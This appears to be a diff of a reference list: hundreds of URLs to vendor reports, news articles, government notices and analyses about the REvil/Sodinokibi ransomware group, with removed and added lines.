- "https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions",
- "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/",
- "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend",
- "https://blog.group-ib.com/REvil_RaaS",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/",
- "https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/",
- "https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://securityscorecard.com/research/a-detailed-analysis-of-the-last-version-of-revil-ransomware",
- "https://www.bankinfosecurity.com/interviews/ransomware-files-episode-6-kaseya-revil-i-5045",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/",
- "https://www.secureworks.com/blog/revil-the-gandcrab-connection",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/",
- "https://www.flashpoint-intel.com/blog/revil-disappears-again/",
- "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
- "https://www.secureworks.com/research/revil-sodinokibi-ransomware",
- "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
- "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html",
- "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20",
- "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/",
- "https://isc.sans.edu/diary/27012",
- "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/",
- "https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis",
- "https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-southfield",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bbc.com/news/technology-59297187",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
- "https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/",
- "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/",
- "https://www.kpn.com/security-blogs/Tracking-REvil.htm",
- "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/",
- "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/",
- "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf",
- "https://www.ironnet.com/blog/ransomware-graphic-blog",
- "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/",
- "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/",
- "https://asec.ahnlab.com/ko/19640/",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://redcanary.com/blog/uncompromised-kaseya/",
- "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.grahamcluley.com/travelex-paid-ransom/",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view",
- "https://threatpost.com/ransomware-revil-sites-disappears/167745/",
- "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/",
- "https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf",
- "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html",
- "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html",
- "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html",
- "https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html",
- "https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/",
- "https://twitter.com/fwosar/status/1420119812815138824",
- "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
- "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/",
- "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released",
- "https://twitter.com/fwosar/status/1411281334870368260",
- "http://www.secureworks.com/research/threat-profiles/gold-southfield",
- "https://asec.ahnlab.com/ko/19860/",
- "https://twitter.com/Jacob_Pimental/status/1391055792774729728",
- "https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process",
- "https://www.cyjax.com/2021/07/09/revilevolution/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/",
- "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/",
- "https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://twitter.com/SophosLabs/status/1412056467201462276",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/",
- "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/",
- "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://unit42.paloaltonetworks.com/revil-threat-actors/",
"https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/",
+ "https://twitter.com/VK_Intel/status/1374571480370061312?s=20",
+ "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil",
+ "https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801",
+ "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/",
+ "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/",
+ "https://www.grahamcluley.com/travelex-paid-ransom/",
+ "https://www.secureworks.com/blog/revil-the-gandcrab-connection",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/",
+ "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/",
+ "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html",
+ "https://asec.ahnlab.com/ko/19640/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/",
+ "https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/",
+ "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released",
+ "https://www.kaseya.com/potential-attack-on-kaseya-vsa/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/",
+ "https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
+ "https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/",
+ "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html",
+ "https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422",
+ "https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
+ "https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain",
+ "https://www.netskope.com/blog/netskope-threat-coverage-revil",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/",
+ "http://www.secureworks.com/research/threat-profiles/gold-southfield",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
+ "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin",
+ "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/",
+ "https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter",
+ "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
+ "https://www.bbc.com/news/technology-59297187",
+ "https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://twitter.com/Jacob_Pimental/status/1391055792774729728",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/",
+ "https://www.ironnet.com/blog/ransomware-graphic-blog",
+ "https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
+ "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel",
+ "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/",
+ "https://www.youtube.com/watch?v=l2P5CMH9TE0",
+ "https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/",
+ "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/",
+ "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80",
+ "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles",
+ "https://home.treasury.gov/news/press-releases/jy0471",
+ "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
+ "https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html",
+ "https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ",
+ "https://twitter.com/VK_Intel/status/1411066870350942213",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html",
+ "https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html",
+ "https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/",
+ "https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent",
+ "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom",
+ "https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.cyjax.com/2021/07/09/revilevolution/",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html",
+ "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/",
+ "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/",
+ "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/",
+ "https://www.flashpoint-intel.com/blog/revil-disappears-again/",
+ "https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/",
+ "https://threatpost.com/ransomware-revil-sites-disappears/167745/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://securelist.com/ransomware-world-in-2021/102169/",
+ "https://twitter.com/SyscallE/status/1411074271875670022",
+ "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa",
+ "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
+ "https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40",
+ "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/",
+ "https://twitter.com/fwosar/status/1411281334870368260",
+ "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/",
+ "https://www.kpn.com/security-blogs/Tracking-REvil.htm",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004",
+ "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/",
+ "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://www.youtube.com/watch?v=P8o6GItci5w",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/",
+ "https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions",
+ "https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack",
+ "https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged",
+ "https://www.secureworks.com/research/lv-ransomware",
+ "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
+ "https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/",
+ "https://twitter.com/fwosar/status/1420119812815138824",
+ "https://hatching.io/blog/ransomware-part2",
+ "https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/",
+ "https://vimeo.com/449849549",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope",
+ "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf",
+ "https://redcanary.com/blog/uncompromised-kaseya/",
+ "https://twitter.com/R3MRUM/status/1412064882623713283",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://blog.group-ib.com/REvil_RaaS",
+ "https://twitter.com/LloydLabs/status/1411098844209819648",
+ "https://twitter.com/SophosLabs/status/1412056467201462276",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident",
+ "https://velzart.nl/blog/ransomeware/",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/",
+ "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
+ "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt",
+ "https://intel471.com/blog/changes-in-revil-ransomware-version-2-2",
+ "https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html",
+ "https://community.riskiq.com/article/3315064b",
+ "https://twitter.com/SophosLabs/status/1413616952313004040?s=20",
+ "https://threatintel.blog/OPBlueRaven-Part1/",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/",
+ "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain",
+ "https://twitter.com/resecurity_com/status/1412662343796813827",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/",
+ "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf",
+ "https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/",
+ "https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://www.youtube.com/watch?v=QYQQUUpU04s",
+ "https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process",
+ "https://www.certego.net/en/news/malware-tales-sodinokibi/",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20",
+ "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend",
+ "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b",
+ "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021",
+ "https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/",
+ "https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/",
+ "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json",
+ "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
"https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://www.secureworks.com/research/revil-sodinokibi-ransomware",
+ "https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/",
+ "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment",
+ "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/",
+ "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya",
+ "https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
+ "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/",
+ "https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/",
